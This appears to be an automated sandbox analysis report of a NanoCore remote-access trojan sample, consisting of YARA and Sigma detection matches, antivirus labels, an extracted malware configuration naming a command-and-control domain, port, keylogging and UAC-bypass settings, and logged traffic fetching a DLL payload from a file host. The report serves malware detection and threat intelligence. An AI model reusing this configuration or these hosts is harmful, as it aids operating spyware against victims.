22.2.dhcpmon.exe.3c59b90.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xc3805:$a: NanoCore 0xc3815:$a: NanoCore 0xc3a49:$a: NanoCore 0xc3a5d:$a: NanoCore 0xc3a9d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0xc3864:$b: ClientPlugin 0xc3a66:$b: ClientPlugin 0xc3aa6:$b: ClientPlugin 0x1007b:$c: ProjectData 0xc398b:$c: ProjectData 0x10a82:$d: DESCrypto 0xc4392:$d: DESCrypto 0x1844e:$e: KeepAlive
1.2.LFEs2N6DU4.exe.3509b70.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.3509b70.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.3509b70.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.3509b70.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
20.2.LFEs2N6DU4.exe.41e9b90.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.41e9b90.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.41e9b90.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.41e9b90.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24198:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241c5:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24198:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25273:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241b2:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x37f25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x381ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x397e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x397da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x3a68b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x40442:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x381d7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x3809b:$c: ProjectData 0x10a82:$d: DESCrypto 0x38aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287c1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287ee:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287c1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2989c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287db:$s5: IClientLoggingHost
21.2.dhcpmon.exe.38a9b90.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0xc3a9d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0xc3ada:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc760d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.38a9b90.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.38a9b90.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xc3805:$a: NanoCore 0xc3815:$a: NanoCore 0xc3a49:$a: NanoCore 0xc3a5d:$a: NanoCore 0xc3a9d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0xc3864:$b: ClientPlugin 0xc3a66:$b: ClientPlugin 0xc3aa6:$b: ClientPlugin 0x1007b:$c: ProjectData 0xc398b:$c: ProjectData 0x10a82:$d: DESCrypto 0xc4392:$d: DESCrypto 0x1844e:$e: KeepAlive
13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0xc3a9d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0xc3ada:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc760d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xc3805:$a: NanoCore 0xc3815:$a: NanoCore 0xc3a49:$a: NanoCore 0xc3a5d:$a: NanoCore 0xc3a9d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0xc3864:$b: ClientPlugin 0xc3a66:$b: ClientPlugin 0xc3aa6:$b: ClientPlugin 0x1007b:$c: ProjectData 0xc398b:$c: ProjectData 0x10a82:$d: DESCrypto 0xc4392:$d: DESCrypto 0x1844e:$e: KeepAlive
Click to see the 198 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9845a945-f2ff-4e93-b909-aece664d", "Group": "J", "Domain1": "cloudhost.myfirewall.org", "Domain2": "cloudhost.myfirewall.org", "Port": 5654, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "cloudhost.myfirewall.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for submitted file

Show sources

Source: LFEs2N6DU4.exe

Virustotal: Detection: 12%

Perma Link

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR

Source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack	Avira: Label: TR/NanoCore.fadte
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 26.2.dhcpmon.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 25.2.dhcpmon.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: LFEs2N6DU4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49756 version: TLS 1.2

Source: LFEs2N6DU4.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: mscorlib.pdb source: LFEs2N6DU4.exe, 0000000D.00000002.530361006.000000000101E000.00000004.00000020.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: cloudhost.myfirewall.org

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 91.121.250.249 91.121.250.249

Source: global traffic

TCP traffic: 192.168.2.7:49746 -> 91.121.250.249:5654

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: LFEs2N6DU4.exe, 00000001.00000002.309201584.00000000023F1000.00000004.00000001.sdmp, LFEs2N6DU4.exe, 00000014.00000002.375508476.0000000003081000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000002.388203081.0000000002741000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000002.397498725.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LFEs2N6DU4.exe, 00000001.00000002.309201584.00000000023F1000.00000004.00000001.sdmp, LFEs2N6DU4.exe, 00000014.00000002.375508476.0000000003081000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000002.388203081.0000000002741000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000002.397498725.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: https://store2.gofile.io
Source: dhcpmon.exe, LFEs2N6DU4.exe	String found in binary or memory: https://store2.gofile.io/download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll

Source: unknown

DNS traffic detected: queries for: store2.gofile.io

Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.7:49756 version: TLS 1.2

Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE
